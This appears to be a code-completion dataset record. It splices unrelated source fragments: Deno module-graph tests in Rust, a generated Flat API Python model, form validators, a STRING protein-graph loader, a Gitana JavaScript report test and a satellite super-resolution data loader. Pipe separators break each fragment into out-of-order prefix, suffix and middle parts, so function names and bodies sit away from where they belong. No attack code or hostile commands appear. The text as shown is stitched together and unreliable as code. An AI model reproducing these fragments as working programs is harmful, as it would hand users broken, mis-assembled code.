maybe_version,
..Module::default()
};
assert!(!module.is_emit_valid(b""));
let source = "console.log(42);".to_string();
let maybe_version = Some(get_version(&source, "0.0.0", b""));
let module = Module {
source,
maybe_version,
..Module::default()
};
assert!(!module.is_emit_valid(b""));
let source = "console.log(42);".to_string();
let module = Module {
source,
..Module::default()
};
assert!(!module.is_emit_valid(b""));
}
#[test]
fn test_module_set_version() {
let source = "console.log(42);".to_string();
let expected = Some(get_version(&source, version::DENO, b""));
let mut module = Module {
source,
..Module::default()
};
assert!(module.maybe_version.is_none());
module.set_version(b"");
assert_eq!(module.maybe_version, expected);
}
#[tokio::test]
async fn test_graph_bundle() {
let tests = vec![
("file:///tests/fixture01.ts", "fixture01.out"),
("file:///tests/fixture02.ts", "fixture02.out"),
("file:///tests/fixture03.ts", "fixture03.out"),
("file:///tests/fixture04.ts", "fixture04.out"),
("file:///tests/fixture05.ts", "fixture05.out"),
("file:///tests/fixture06.ts", "fixture06.out"),
("file:///tests/fixture07.ts", "fixture07.out"),
("file:///tests/fixture08.ts", "fixture08.out"),
("file:///tests/fixture09.ts", "fixture09.out"),
("file:///tests/fixture10.ts", "fixture10.out"),
("file:///tests/fixture11.ts", "fixture11.out"),
("file:///tests/fixture12.ts", "fixture12.out"),
("file:///tests/fixture13.ts", "fixture13.out"),
("file:///tests/fixture14.ts", "fixture14.out"),
];
let c = PathBuf::from(env::var_os("CARGO_MANIFEST_DIR").unwrap());
let fixtures = c.join("tests/bundle");
for (specifier, expected_str) in tests {
let specifier = ModuleSpecifier::resolve_url_or_path(specifier).unwrap();
let handler = Rc::new(RefCell::new(MockSpecifierHandler {
fixtures: fixtures.clone(),
..MockSpecifierHandler::default()
}));
let mut builder = GraphBuilder2::new(handler.clone(), None, None);
builder
.add(&specifier, false)
.await
.expect("module not inserted");
let graph = builder.get_graph();
let (actual, stats, maybe_ignored_options) = graph
.bundle(BundleOptions::default())
.expect("could not bundle");
assert_eq!(stats.0.len(), 2);
assert_eq!(maybe_ignored_options, None);
let expected_path = fixtures.join(expected_str);
let expected = fs::read_to_string(expected_path).unwrap();
assert_eq!(actual, expected, "fixture: {}", specifier);
}
}
#[tokio::test]
async fn test_graph_check_emit() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts")
.expect("could not resolve module");
let (graph, handler) = setup(specifier).await;
let result_info = graph
.check(CheckOptions {
debug: false,
emit: true,
lib: TypeLib::DenoWindow,
maybe_config_path: None,
reload: false,
})
.expect("should have checked");
assert!(result_info.maybe_ignored_options.is_none());
assert_eq!(result_info.stats.0.len(), 12);
assert!(result_info.diagnostics.is_empty());
let h = handler.borrow();
assert_eq!(h.cache_calls.len(), 2);
assert_eq!(h.tsbuildinfo_calls.len(), 1);
}
#[tokio::test]
async fn test_graph_check_no_emit() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts")
.expect("could not resolve module");
let (graph, handler) = setup(specifier).await;
let result_info = graph
.check(CheckOptions {
debug: false,
emit: false,
lib: TypeLib::DenoWindow,
maybe_config_path: None,
reload: false,
})
.expect("should have checked");
assert!(result_info.maybe_ignored_options.is_none());
assert_eq!(result_info.stats.0.len(), 12);
assert!(result_info.diagnostics.is_empty());
let h = handler.borrow();
assert_eq!(h.cache_calls.len(), 0);
assert_eq!(h.tsbuildinfo_calls.len(), 1);
}
#[tokio::test]
async fn test_graph_check_user_config() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/checkwithconfig.ts")
.expect("could not resolve module");
let (graph, handler) = setup(specifier.clone()).await;
let result_info = graph
.check(CheckOptions {
debug: false,
emit: true,
lib: TypeLib::DenoWindow,
maybe_config_path: Some(
"tests/module_graph/tsconfig_01.json".to_string(),
),
reload: true,
})
.expect("should have checked");
assert!(result_info.maybe_ignored_options.is_none());
assert!(result_info.diagnostics.is_empty());
let h = handler.borrow();
assert_eq!(h.version_calls.len(), 2);
let ver0 = h.version_calls[0].1.clone();
let ver1 = h.version_calls[1].1.clone();
    // let's do it all over again to ensure that the versions are deterministic
let (graph, handler) = setup(specifier).await;
let result_info = graph
.check(CheckOptions {
debug: false,
emit: true,
lib: TypeLib::DenoWindow,
maybe_config_path: Some(
"tests/module_graph/tsconfig_01.json".to_string(),
),
reload: true,
})
.expect("should have checked");
assert!(result_info.maybe_ignored_options.is_none());
assert!(result_info.diagnostics.is_empty());
let h = handler.borrow();
assert_eq!(h.version_calls.len(), 2);
assert!(h.version_calls[0].1 == ver0 || h.version_calls[0].1 == ver1);
assert!(h.version_calls[1].1 == ver0 || h.version_calls[1].1 == ver1);
}
#[tokio::test]
async fn test_graph_emit() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///a.ts").unwrap();
let graph = setup_memory(
specifier,
map!(
"/a.ts" => r#"
import * as b from "./b.ts";
console.log(b);
"#,
"/b.ts" => r#"
export const b = "b";
"#
),
)
.await;
let (emitted_files, result_info) = graph
.emit(EmitOptions {
bundle_type: BundleType::None,
debug: false,
maybe_user_config: None,
})
.expect("should have emitted");
assert!(result_info.diagnostics.is_empty());
assert!(result_info.maybe_ignored_options.is_none());
assert_eq!(emitted_files.len(), 4);
let out_a = emitted_files.get("file:///a.ts.js");
assert!(out_a.is_some());
let out_a = out_a.unwrap();
assert!(out_a.starts_with("import * as b from"));
assert!(emitted_files.contains_key("file:///a.ts.js.map"));
let out_b = emitted_files.get("file:///b.ts.js");
assert!(out_b.is_some());
let out_b = out_b.unwrap();
assert!(out_b.starts_with("export const b = \"b\";"));
assert!(emitted_files.contains_key("file:///b.ts.js.map"));
}
#[tokio::test]
async fn test_graph_emit_bundle() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///a.ts").unwrap();
let graph = setup_memory(
specifier,
map!(
"/a.ts" => r#"
import * as b from "./b.ts";
console.log(b);
"#,
"/b.ts" => r#"
export const b = "b";
"#
),
)
.await;
let (emitted_files, result_info) = graph
.emit(EmitOptions {
bundle_type: BundleType::Esm,
debug: false,
maybe_user_config: None,
})
.expect("should have emitted");
assert!(result_info.diagnostics.is_empty());
assert!(result_info.maybe_ignored_options.is_none());
assert_eq!(emitted_files.len(), 1);
let actual = emitted_files.get("deno:///bundle.js");
assert!(actual.is_some());
let actual = actual.unwrap();
assert!(actual.contains("const b = \"b\";"));
assert!(actual.contains("console.log(b);"));
}
#[tokio::test]
async fn test_graph_info() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts")
.expect("could not resolve module");
let (graph, _) = setup(specifier).await;
let info = graph.info().expect("could not get info");
assert!(info.compiled.is_none());
assert_eq!(info.dep_count, 6);
assert_eq!(info.file_type, MediaType::TypeScript);
assert_eq!(info.files.0.len(), 7);
assert!(info.local.to_string_lossy().ends_with("file_tests-main.ts"));
assert!(info.map.is_none());
assert_eq!(
info.module,
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts").unwrap()
);
assert_eq!(info.total_size, 344);
}
#[tokio::test]
async fn test_graph_import_json() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/importjson.ts")
.expect("could not resolve module");
let c = PathBuf::from(env::var_os("CARGO_MANIFEST_DIR").unwrap());
let fixtures = c.join("tests/module_graph");
let handler = Rc::new(RefCell::new(MockSpecifierHandler {
fixtures,
..MockSpecifierHandler::default()
}));
let mut builder = GraphBuilder2::new(handler.clone(), None, None);
builder
.add(&specifier, false)
.await
.expect_err("should have errored");
}
#[tokio::test]
async fn test_graph_transpile() {
// This is a complex scenario of transpiling, where we have TypeScript
// importing a JavaScript file (with type definitions) which imports
// TypeScript, JavaScript, and JavaScript with type definitions.
// For scenarios where we transpile, we only want the TypeScript files
// to be actually emitted.
//
// This also exercises "@deno-types" and type references.
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts")
.expect("could not resolve module");
let (mut graph, handler) = setup(specifier).await;
let (stats, maybe_ignored_options) =
graph.transpile(TranspileOptions::default()).unwrap();
assert_eq!(stats.0.len(), 3);
assert_eq!(maybe_ignored_options, None);
let h = handler.borrow();
assert_eq!(h.cache_calls.len(), 2);
match &h.cache_calls[0].1 {
Emit::Cli((code, maybe_map)) => {
assert!(
code.contains("# sourceMappingURL=data:application/json;base64,")
);
assert!(maybe_map.is_none());
}
};
match &h.cache_calls[1].1 {
Emit::Cli((code, maybe_map)) => {
assert!(
code.contains("# sourceMappingURL=data:application/json;base64,")
);
assert!(maybe_map.is_none());
}
};
assert_eq!(h.deps_calls.len(), 7);
assert_eq!(
h.deps_calls[0].0,
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts").unwrap()
);
assert_eq!(h.deps_calls[0].1.len(), 1);
assert_eq!(
h.deps_calls[1].0,
ModuleSpecifier::resolve_url_or_path("https://deno.land/x/lib/mod.js")
.unwrap()
);
assert_eq!(h.deps_calls[1].1.len(), 3);
assert_eq!(
h.deps_calls[2].0,
ModuleSpecifier::resolve_url_or_path("https://deno.land/x/lib/mod.d.ts")
.unwrap()
);
assert_eq!(h.deps_calls[2].1.len(), 3, "should have 3 dependencies");
// sometimes the calls are not deterministic, and so checking the contents
// can cause some failures
assert_eq!(h.deps_calls[3].1.len(), 0, "should have no dependencies");
assert_eq!(h.deps_calls[4].1.len(), 0, "should have no dependencies");
assert_eq!(h.deps_calls[5].1.len(), 0, "should have no dependencies");
assert_eq!(h.deps_calls[6].1.len(), 0, "should have no dependencies");
}
#[tokio::test]
async fn test_graph_transpile_user_config() {
let specifier =
ModuleSpecifier::resolve_url_or_path("https://deno.land/x/transpile.tsx")
.expect("could not resolve module");
let (mut graph, handler) = setup(specifier).await;
let (_, maybe_ignored_options) = graph
.transpile(TranspileOptions {
debug: false,
maybe_config_path: Some("tests/module_graph/tsconfig.json".to_string()),
reload: false,
})
.unwrap();
assert_eq!(
maybe_ignored_options.unwrap().items,
vec!["target".to_string()],
"the 'target' options should have been ignored"
);
let h = handler.borrow();
assert_eq!(h.cache_calls.len(), 1, "only one file should be emitted");
// FIXME(bartlomieju): had to add space in `<div>`, probably a quirk in swc_ecma_codegen
match &h.cache_calls[0].1 {
Emit::Cli((code, _)) => {
assert!(
code.contains("<div >Hello world!</div>"),
"jsx should have been preserved"
);
}
}
}
#[tokio::test]
async fn test_graph_with_lockfile() {
let c = PathBuf::from(env::var_os("CARGO_MANIFEST_DIR").unwrap());
let fixtures = c.join("tests/module_graph");
let lockfile_path = fixtures.join("lockfile.json");
let lockfile =
Lockfile::new(lockfile_path, false).expect("could not load lockfile");
let maybe_lockfile = Some(Arc::new(Mutex::new(lockfile)));
let handler = Rc::new(RefCell::new(MockSpecifierHandler {
fixtures,
..MockSpecifierHandler::default()
}));
let mut builder = GraphBuilder2::new(handler.clone(), None, maybe_lockfile);
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts")
.expect("could not resolve module");
builder
.add(&specifier, false)
.await
.expect("module not inserted");
builder.get_graph();
}
}
| {
self.version_calls.push((specifier.clone(), version));
Ok(())
} |
app.py | def launch():
print('This is the launch method!') | ||
collection_type.py | # coding: utf-8
"""
Flat API
    The Flat API allows you to easily extend the abilities of the [Flat Platform](https://flat.io), with a wide range of use cases including the following: * Creating and importing new music scores using MusicXML, MIDI, Guitar Pro (GP3, GP4, GP5, GPX, GP), PowerTab, TuxGuitar and MuseScore files * Browsing, updating, copying, exporting the user's scores (for example in MP3, WAV or MIDI) * Managing educational resources with Flat for Education: creating & updating the organization accounts, the classes, rosters and assignments. The Flat API is built on HTTP. Our API is RESTful. It has predictable resource URLs. It returns HTTP response codes to indicate errors. It also accepts and returns JSON in the HTTP body. The [schema](/swagger.yaml) of this API follows the [OpenAPI Initiative (OAI) specification](https://www.openapis.org/), you can use and work with [compatible Swagger tools](http://swagger.io/open-source-integrations/). This API features Cross-Origin Resource Sharing (CORS) implemented in compliance with [W3C spec](https://www.w3.org/TR/cors/). You can use your favorite HTTP/REST library for your programming language to use Flat's API. This specification and reference is [available on Github](https://github.com/FlatIO/api-reference). Getting Started and learn more: * [API Overview and introduction](https://flat.io/developers/docs/api/) * [Authentication (Personal Access Tokens or OAuth2)](https://flat.io/developers/docs/api/authentication.html) * [SDKs](https://flat.io/developers/docs/api/sdks.html) * [Rate Limits](https://flat.io/developers/docs/api/rate-limits.html) * [Changelog](https://flat.io/developers/docs/api/changelog.html) # noqa: E501
OpenAPI spec version: 2.7.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class CollectionType(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
allowed enum values
"""
ROOT = "root"
REGULAR = "regular"
SHAREDWITHME = "sharedWithMe"
SHAREDWITHGROUP = "sharedWithGroup"
TRASH = "trash"
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
}
attribute_map = {
}
def __init__(self): # noqa: E501
"""CollectionType - a model defined in OpenAPI""" # noqa: E501
self.discriminator = None
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
|
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| """Returns true if both objects are equal"""
if not isinstance(other, CollectionType):
return False
return self.__dict__ == other.__dict__ |
validators.py | from dictization_functions import missing, StopOnError, Invalid
from pylons.i18n import _
def identity_converter(key, data, errors, context):
return
def keep_extras(key, data, errors, context):
extras = data.pop(key, {})
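    # Keys are flattened-dict tuples; swap the last element for each extras key
    # so the extras values are re-inserted as siblings of the original key.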
for extras_key, value in extras.iteritems():
data[key[:-1] + (extras_key,)] = value
def not_missing(key, data, errors, context):
value = data.get(key)
if value is missing:
errors[key].append(_('Missing value'))
raise StopOnError
def not_empty(key, data, errors, context):
value = data.get(key)
if not value or value is missing:
errors[key].append(_('Missing value'))
raise StopOnError
def if_empty_same_as(other_key):
def callable(key, data, errors, context):
value = data.get(key)
if not value or value is missing:
data[key] = data[key[:-1] + (other_key,)]
return callable
def both_not_empty(other_key):
def callable(key, data, errors, context):
value = data.get(key)
other_value = data.get(key[:-1] + (other_key,))
        if ((not value or value is missing) and
                (not other_value or other_value is missing)):
errors[key].append(_('Missing value'))
raise StopOnError
return callable
def empty(key, data, errors, context):
value = data.pop(key, None)
if value and value is not missing:
errors[key].append(_(
'The input field %(name)s was not expected.') % {"name": key[-1]})
def ignore(key, data, errors, context):
|
def default(default_value):
    def callable(key, data, errors, context):
        value = data.get(key)
        if not value or value is missing:
            data[key] = default_value
    return callable
def ignore_missing(key, data, errors, context):
value = data.get(key)
if value is missing or value is None:
data.pop(key, None)
raise StopOnError
def ignore_empty(key, data, errors, context):
value = data.get(key)
if value is missing or not value:
data.pop(key, None)
raise StopOnError
def convert_int(value, context):
try:
return int(value)
except ValueError:
raise Invalid(_('Please enter an integer value'))
| value = data.pop(key, None)
raise StopOnError |
candidatussericytochromatiabacteriums15bmn24raac196.py | """
This file offers the methods to automatically retrieve the graph Candidatus Sericytochromatia bacterium S15B-MN24 RAAC_196.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def | (
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Candidatus Sericytochromatia bacterium S15B-MN24 RAAC_196 graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
        Whether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
    Whether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
    cache_path: str = "graphs/string"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instance of Candidatus Sericytochromatia bacterium S15B-MN24 RAAC_196 graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="CandidatusSericytochromatiaBacteriumS15bMn24Raac196",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
| CandidatusSericytochromatiaBacteriumS15bMn24Raac196 |
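A minimal usage sketch of the retrieval function above (all arguments keep their defaults; the first call downloads and preprocesses the STRING data, so it needs network access and a writable cache directory):

    graph = CandidatusSericytochromatiaBacteriumS15bMn24Raac196(version="links.v11.5")
    # `graph` is an ensmallen Graph instance and can be queried or fed to downstream embedding pipelines.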
testReport1.js | (function($) {
module("report1");
// Test case : Report 1
_asyncTest("report1", function()
{
expect(2);
GitanaTest.authenticateNewTenant(function() {
// NOTE: this = platform
var platform = this;
this.createReport({
"tag": "a"
});
this.createReport({
"tag": "a"
});
var r = null;
this.createReport({
"tag": "b"
}).then(function() {
r = this;
});
|
this.queryReports({
"tag": "a"
}).count(function(count) {
equal(count, 2, "Found two reports");
});
this.subchain(r).then(function() {
this.update().reload().del();
this.then(function() {
start();
});
});
});
});
}(jQuery) ); | this.listReports().count(function(count) {
equal(count, 3, "Found three reports");
}); |
data_loader.py | import os
from collections import OrderedDict
from typing import Tuple, List, Callable
from fs_s3fs import S3FS
import numpy as np
import pandas as pd
import torch
from torch.utils.data import Dataset
from skimage.exposure import match_histograms
from datetime import datetime
from eolearn.core import EOPatch
def augment(
lr: np.ndarray,
hr: np.ndarray,
flip: bool = True,
rotate: bool = True,
distribution_shift: bool = False,
distribution_scale: bool = False,
permute_timestamps: bool = True,
max_distribution_shift: float = 0.25,
max_distribution_scale_diff: float = 0.25,
proba_of_original: float = 0.67
) -> Tuple[np.ndarray, np.ndarray]:
"""
Performs a series of image augmentations with specified probability.
:param lr: array of low-resolution images, shape is `CxTxHxW`
:param hr: array of high-resolution images, shape is `CxHxW`
:param flip: whether to randomly flip height or width of arrays
:param rotate: whether to randomly rotate the arrays
:param distribution_shift: add an offset to the distribution
:param distribution_scale: scale the channels distribution
:param permute_timestamps: permute timestamps (not desired for HRN)
:param max_distribution_shift: set max distribution shift used in distribution shift augmentation
:param max_distribution_scale_diff: set max distribution scale used in distribution scale augmentation
    :param proba_of_original: set probability of not modifying original patch, e.g. 1 means no augmentations
:returns: augmented lr and hr arrays
"""
# Base probability which, after `n_aug_conditions`, reduces to `proba_of_original`
n_aug_conditions = sum(1. for aug_op in (flip, rotate, distribution_shift, distribution_scale, permute_timestamps)
if aug_op)
rng_threshold = proba_of_original ** (1. / n_aug_conditions)
if flip and np.random.random() > rng_threshold:
flip_axis = np.random.choice([-2, -1])
lr = np.flip(lr, axis=flip_axis)
hr = np.flip(hr, axis=flip_axis)
if rotate and np.random.random() > rng_threshold:
k = np.random.choice(np.arange(-2, 3))
lr = np.rot90(lr, k=k, axes=(-2, -1))
hr = np.rot90(hr, k=k, axes=(-2, -1))
if distribution_shift and np.random.random() > rng_threshold:
d_shift = (np.random.random() - 0.5) * max_distribution_shift
lr = lr + d_shift
hr = hr + d_shift
if distribution_scale and np.random.random() > rng_threshold:
d_scale = 1. + (np.random.random() - 0.5) * max_distribution_scale_diff
lr_mean = np.mean(lr, axis=(-2, -1))[..., None, None]
hr_mean = np.mean(hr, axis=(-2, -1))[..., None, None]
lr = (lr - lr_mean) * d_scale + lr_mean
hr = (hr - hr_mean) * d_scale + hr_mean
if permute_timestamps and np.random.random() > rng_threshold:
# expects lr in `CxTxHxW` shape
indices = np.random.permutation(lr.shape[1])
lr = lr[:, indices]
return lr, hr
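# A worked example (a sketch, not part of the original module) of the probability
# arithmetic used in `augment` above.
def _augment_probability_example() -> float:
    """With the defaults flip=rotate=permute_timestamps=True and the two
    distribution augmentations off, three conditions are active, so each one
    fires when np.random.random() > 0.67 ** (1 / 3) ~= 0.875 (probability ~0.125),
    and the patch is returned unchanged with probability 0.875 ** 3 == 0.67,
    i.e. `proba_of_original`."""
    n_aug_conditions = 3
    rng_threshold = 0.67 ** (1.0 / n_aug_conditions)   # ~0.875
    return rng_threshold ** n_aug_conditions           # == proba_of_original (0.67)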
def pad_to_k(feat: np.ndarray, k: int = 16, pad_to_front: bool = True) -> np.ndarray:
""" Create an array with first dimension equal to k, filling with 0s in front or at back """
n_pad = k - len(feat)
if n_pad < 0:
raise ValueError(f'Can not pad when length of features: {len(feat)} is longer than k: {k}')
(_, h, w, c) = feat.shape
if pad_to_front:
feat = np.concatenate((np.zeros(shape=(n_pad, h, w, c)), feat))
else:
feat = np.concatenate((feat, np.zeros(shape=(n_pad, h, w, c))))
return feat
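# A small usage sketch (not part of the original module): a 5-frame TxHxWxC stack
# padded to k=16 gains 11 all-zero frames, prepended when pad_to_front=True.
def _pad_to_k_example() -> Tuple[int, ...]:
    padded = pad_to_k(np.zeros((5, 32, 32, 4)), k=16, pad_to_front=True)
    return padded.shape  # (16, 32, 32, 4)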
class ImageSet(OrderedDict):
"""
    An OrderedDict-derived class that groups the assets of an imageset, with pretty-print functionality.
"""
def __init__(self, *args, **kwargs):
super(ImageSet, self).__init__(*args, **kwargs)
def | (self):
dict_info = f"{'name':>10} : {self['name']}"
for name, v in self.items():
if hasattr(v, 'shape'):
dict_info += f"\n{name:>10} : {v.shape} {v.__class__.__name__} ({v.dtype})"
else:
dict_info += f"\n{name:>10} : {v.__class__.__name__} ({v})"
return dict_info
def read_imageset(imset_file: str,
filesystem: S3FS = None,
normalize: bool = True,
country_norm_df: pd.DataFrame = None,
norm_deimos_npz: np.lib.npyio.NpzFile = None,
norm_s2_npz: np.lib.npyio.NpzFile = None,
n_views: int = 16,
padding: str = 'zeros',
histogram_matching: bool = False) -> ImageSet:
"""
Retrieves all assets from the given directory.
:param imset_file: name of npz file with sample imageset
:param filesystem: S3 filesystem to read files directly from bucket. Default reads from local disk
:param normalize: whether to normalize data or not
:param country_norm_df: S2 median/std normalization factors stored per country
:param norm_deimos_npz: 1st and 99th percentile normalization factors for DEIMOS
:param norm_s2_npz: 1st and 99th percentile normalization factors for S2
:param n_views: number of time frames to consider in lrs sequence. If n_views is smaller than the available time
                    frames, `n_views` timeframes from the lrs sequence are taken in reverse order, i.e. last is first
:param padding: strategy used to fill lrs sequence if n_views is greater than available timestamps. Supported
options are `zeros`, where 0 frames are prepended to features, or `repeat` where random repeats of
timeframes are taken
:param histogram_matching: whether to match the histogram between the HR and the corresponding LR image
"""
assert padding in ['zeros', 'repeat']
# Read asset names
npz = np.load(filesystem.openbin(imset_file), allow_pickle=True) if filesystem else np.load(imset_file,
allow_pickle=True)
features = npz['features']
hr = npz['labels']
if normalize:
country = npz['countries']
country_stats = country_norm_df[country_norm_df.country == str(country)]
norm_median = country_stats[['median_0', 'median_1', 'median_2', 'median_3']].values
norm_std = country_stats[['std_0', 'std_1', 'std_2', 'std_3']].values
features = (features - norm_median) / norm_std
deimos_p1 = norm_deimos_npz['p1']
deimos_p99 = norm_deimos_npz['p99']
s2_p1 = norm_s2_npz['p1']
s2_p99 = norm_s2_npz['p99']
hr = (hr - deimos_p1) / (deimos_p99 - deimos_p1)
features = (features - s2_p1) / (s2_p99 - s2_p1)
alphas = np.ones(n_views)
if histogram_matching:
hr = match_histograms(hr, features[-1], multichannel=True)
n_feature_timestamps = len(features)
if n_feature_timestamps < n_views:
if padding == 'zeros':
features = pad_to_k(features, n_views, pad_to_front=False)
alphas[n_feature_timestamps:] = 0
elif padding == 'repeat':
n_pad = n_views - n_feature_timestamps
padded = features[-1:].repeat(n_pad, axis=0)
features = np.concatenate((features, padded))
else:
features = features[-n_views:, ...]
# Tensor is `CxTxHxW`
features = np.moveaxis(features, -1, 0)
hr = np.moveaxis(hr, 2, 0)
imageset = ImageSet(name=os.path.basename(imset_file),
timestamp_deimos=str(npz['timetamps_deimos'].item()),
lr=features,
hr=hr,
alphas=alphas)
return imageset
class ImagesetDataset(Dataset):
""" Derived Dataset class for loading many imagesets from a list of directories.
:param imset_dir: name of directory containing files
:param imset_npz_files: list of filenames that constitute the dataset
:param time_first: whether returned lrs sequence should have time dimension first or channels. Use `time_first=True`
                       if you are training the HRN model (`BxTxCxHxW`), `time_first=False` if you are training RAMS
                       (`BxCxTxHxW`)
:param filesystem: S3 filesystem to read files directly from bucket. Default reads from local disk
:param normalize: whether to normalize data or not
:param country_norm_df: S2 median/std normalization factors stored per country
:param norm_deimos_npz: 1st and 99th percentile normalization factors for DEIMOS
:param norm_s2_npz: 1st and 99th percentile normalization factors for S2
:param channels_feats: which channels (i.e. indices) are extracted from lrs sequence
:param channels_labels: which channels (i.e. indices) are extracted from hr image
:param n_views: number of time frames to consider in lrs sequence. If n_views is smaller than the available time
                    frames, `n_views` timeframes from the lrs sequence are taken in reverse order, i.e. last is first
:param padding: strategy used to fill lrs sequence if n_views is greater than available timestamps. Supported
options are `zeros`, where 0 frames are appended to features, or `repeat` where random repeats of
timeframes are taken
:param transform: function executed on lr and hr arrays as augmentation
:param histogram_matching: whether to match the histogram between the HR and the corresponding LR image
"""
def __init__(
self,
imset_dir: str,
imset_npz_files: list,
time_first: bool,
filesystem: object = None,
normalize: bool = True,
country_norm_df: object = None,
norm_deimos_npz: np.ndarray = None,
norm_s2_npz: np.ndarray = None,
channels_feats: List[int] = [0, 1, 2, 3],
channels_labels: List[int] = [0, 1, 2, 3],
n_views: int = 16,
padding: str = 'zeros',
transform: Callable = None,
histogram_matching: bool = False
):
super().__init__()
self.imset_dir = imset_dir
self.filesystem = filesystem
self.imset_npz_files = imset_npz_files
self.time_first = time_first
self.normalize = normalize
self.country_norm_df = country_norm_df
self.norm_deimos_npz = norm_deimos_npz
self.norm_s2_npz = norm_s2_npz
self.channels_feats = channels_feats
self.channels_labels = channels_labels
self.n_views = n_views
self.padding = padding
self.transform = transform
self.histogram_matching = histogram_matching
def __len__(self):
return len(self.imset_npz_files)
def __getitem__(self, index: int) -> ImageSet:
""" Returns an ImageSet dict of all assets in the directory of the given index."""
if isinstance(index, int):
imset_file = os.path.join(self.imset_dir, self.imset_npz_files[index])
else:
raise KeyError('Index must be of type `int`.')
imset = read_imageset(
imset_file=imset_file,
filesystem=self.filesystem,
normalize=self.normalize,
country_norm_df=self.country_norm_df,
norm_deimos_npz=self.norm_deimos_npz,
norm_s2_npz=self.norm_s2_npz,
n_views=self.n_views,
padding=self.padding,
histogram_matching=self.histogram_matching
)
lr = imset['lr'][self.channels_feats]
hr = imset['hr'][self.channels_labels]
if self.transform is not None:
lr, hr = self.transform(lr, hr)
if self.time_first:
lr = np.swapaxes(lr, 0, 1)
imset['lr'] = torch.from_numpy(lr.copy())
imset['hr'] = torch.from_numpy(hr.copy())
imset['alphas'] = torch.from_numpy(imset['alphas'])
return imset
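# A minimal usage sketch (not part of the original module); the directory and npz
# file names below are placeholders, and normalization is disabled so the sketch
# does not need the country/percentile statistics.
def _example_dataloader() -> torch.utils.data.DataLoader:
    dataset = ImagesetDataset(
        imset_dir='data/imagesets',              # placeholder directory
        imset_npz_files=['patch_0001.npz'],      # placeholder sample file
        time_first=True,                         # HRN-style batches, i.e. BxTxCxHxW
        normalize=False,
        transform=augment,                       # augmentation defined above
    )
    return torch.utils.data.DataLoader(dataset, batch_size=1, shuffle=True)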
def filter_cloudy_s2(eop, max_cc):
idxs = []
for i, _ in enumerate(eop.timestamp):
if (eop.mask['CLM'][i, ...].mean() <= max_cc) and (eop.mask['IS_DATA'].mean() == 1):
idxs.append(i)
eop.data['BANDS'] = eop.data['BANDS'][idxs, ...]
eop.data['CLP'] = eop.data['CLP'][idxs, ...]
eop.mask['CLM'] = eop.mask['CLM'][idxs, ...]
eop.mask['IS_DATA'] = eop.mask['IS_DATA'][idxs, ...]
eop.timestamp = list(np.array(eop.timestamp)[idxs])
return eop
def timestamps_within_date(timestamps, start_date, end_date):
    timestamps = [ts.replace(tzinfo=None) for ts in timestamps]  # remove tzinfo that is present in batch data
